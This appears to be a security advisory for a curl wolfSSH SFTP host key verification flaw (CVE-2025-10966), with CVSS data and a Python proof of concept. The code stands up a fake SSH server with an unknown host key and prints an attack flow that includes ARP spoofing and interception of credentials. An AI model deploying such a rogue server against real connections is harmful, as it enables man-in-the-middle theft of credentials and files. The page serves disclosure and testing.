curl's code for managing SSH connections when SFTP was done using the wolfSSH-powered backend was flawed and lacked host key verification. This prevents curl from detecting MITM attackers, among other consequences.
CVSS Details
CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Configurations (Affected Products)
cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:* - VULNERABLE
curl (wolfSSH backend) < 8.11.0
curl (wolfSSH backend) < 8.10.8
The specific affected versions depend on which curl releases contain the wolfSSH backend with the verification bug.
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10966 PoC - curl wolfSSH SFTP MITM Attack Simulation
# This PoC demonstrates the host key verification bypass in curl's wolfSSH backend
import socket
import threading
import paramiko
import time
from paramiko import RSAKey, Transport
class FakeSFTPServer:
    """Stand-in SSH server used to observe whether a client completes key
    exchange against an unknown host key.

    The server presents a freshly generated RSA host key on every run. A
    client that checks host keys against known_hosts or a pinned fingerprint
    is expected to abort during key exchange; a client that does not will
    continue on to authentication. Nothing is relayed to a real SFTP server
    and no SFTP subsystem is implemented here.
    """

    def __init__(self, host='0.0.0.0', port=22, target_port=22):
        # Listening address; the default binds every interface.
        self.host = host
        self.port = port
        # NOTE(review): target_port is stored but never read in this file —
        # no connection to an upstream server is ever made.
        self.target_port = target_port
        # Ephemeral host key: it will not match any entry a client has on record.
        self.host_key = RSAKey.generate(2048)

    def start(self):
        """Bind, listen and hand each accepted connection to its own thread.

        Blocks forever; the listening socket is never closed.
        """
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Allow an immediate rebind after a restart.
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind((self.host, self.port))
        server_socket.listen(5)
        print(f"[*] Fake SFTP server listening on port {self.port}")
        while True:
            client_socket, addr = server_socket.accept()
            print(f"[+] Connection received from {addr}")
            # One non-daemon thread per connection; threads are never joined.
            threading.Thread(target=self.handle_client, args=(client_socket,)).start()

    def handle_client(self, client_socket):
        """Run the SSH server side of one connection and report whether a
        channel was opened.

        Args:
            client_socket: accepted TCP socket; always closed on return.
        """
        try:
            transport = Transport(client_socket)
            transport.add_server_key(self.host_key)
            # No ServerInterface is supplied, so paramiko's default policy
            # governs the authentication step — confirm its behaviour before
            # reading anything into a missing "[+] Client connected" line.
            transport.start_server()
            # Wait for client authentication
            channel = transport.accept(timeout=30)
            if channel:
                # A channel exists only if the client proceeded past the unknown
                # key and authenticated. NOTE(review): that is consistent with
                # missing verification but also with a client configured to
                # trust unknown keys, so treat this as an indicator, not proof.
                print("[+] Client connected - host verification was BYPASSED")
                print("[!] Attacker can now intercept/modify all SFTP traffic")
                # Sends a fixed banner only; nothing is logged or relayed.
                channel.send(b"Welcome to fake SFTP server\r\n")
                time.sleep(1)
                channel.close()
        except Exception as e:
            # Broad catch: any handshake failure, including a client that
            # rejects the key, is printed here rather than raised.
            print(f"[-] Error: {e}")
        finally:
            client_socket.close()
def generate_mitm_script():
    """Return the text of a shell script that prints the scenario description.

    The script is purely informational: every line is an ``echo``. Nothing in
    this file writes it to disk or executes it. The "Detection Method" lines
    only show how to tell which SSH backend curl was built with.
    """
    script = '''#!/bin/bash
# CVE-2025-10966 MITM Attack Script
# For educational and authorized testing purposes only
echo "CVE-2025-10966: curl wolfSSH SFTP Host Verification Bypass"
echo "========================================================="
echo ""
echo "Attack Prerequisites:"
echo "1. Attacker must be positioned for MITM (same network/ARP spoofing)"
echo "2. Target must be using curl with wolfSSH backend for SFTP"
echo "3. No host key verification is performed by vulnerable curl"
echo ""
echo "Attack Flow:"
echo "1. Attacker intercepts SFTP connection request"
echo "2. Attacker presents their own SSH host key"
echo "3. Vulnerable curl accepts key WITHOUT verification"
echo "4. Attacker establishes 'secure' channel with victim"
echo "5. All data (credentials, files) can be intercepted"
echo ""
echo "Detection Method:"
echo "# Check if curl was built with wolfSSH support"
echo "curl --version | grep wolfssh"
echo ""
echo "# Verify host key changes (if verification was working)"
echo "ssh-keyscan -t rsa sftp-server.example.com"
'''
    return script
if __name__ == "__main__":
    # Banner, then block forever in the accept loop of the fake server.
    banner = "CVE-2025-10966 PoC - curl wolfSSH SFTP Host Verification Bypass"
    print(banner)
    print("=" * 70)
    print("\n[!] This PoC is for educational and authorized testing purposes only")
    print("\nStarting fake SFTP server...")
    # Binds every interface on 2222 rather than the privileged default port 22.
    FakeSFTPServer(host='0.0.0.0', port=2222).start()